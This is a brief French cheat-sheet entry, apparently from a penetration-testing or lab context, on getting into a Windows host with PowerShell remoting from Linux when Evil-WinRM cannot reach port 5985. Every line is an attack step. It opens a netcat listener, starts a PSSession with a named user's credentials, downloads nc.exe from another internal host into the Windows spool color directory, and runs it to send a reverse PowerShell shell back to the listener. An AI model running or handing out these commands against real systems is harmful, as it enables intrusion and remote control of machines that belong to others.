Si Evil-WinRm ne fonctionne pas car le port 5985 n’est pas ouvert : nous pouvons utiliser Powershell pour Linux pour se connecter.
sudo apt install gss-ntlmssp
sudo apt-get install powershell
nc -nvlp 9001
pwsh
$offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential germain
Enter-PSSession $offsec_session
PS> &{ cd ../Desktop }
PS> &{ ls }
PS> &{ iwr -uri http://10.10.10.11/nc.exe -o ‘C:\Windows\System32\spool\drivers\color\nc.exe’}
PS> &{ cd ‘C:\Windows\System32\spool\drivers\color\’}
PS> &{ ./nc.exe 10.10.10.12 9001 -e powershell.exe} #Nous n’avons plus besoin d’utiliser les blocks : &{ }
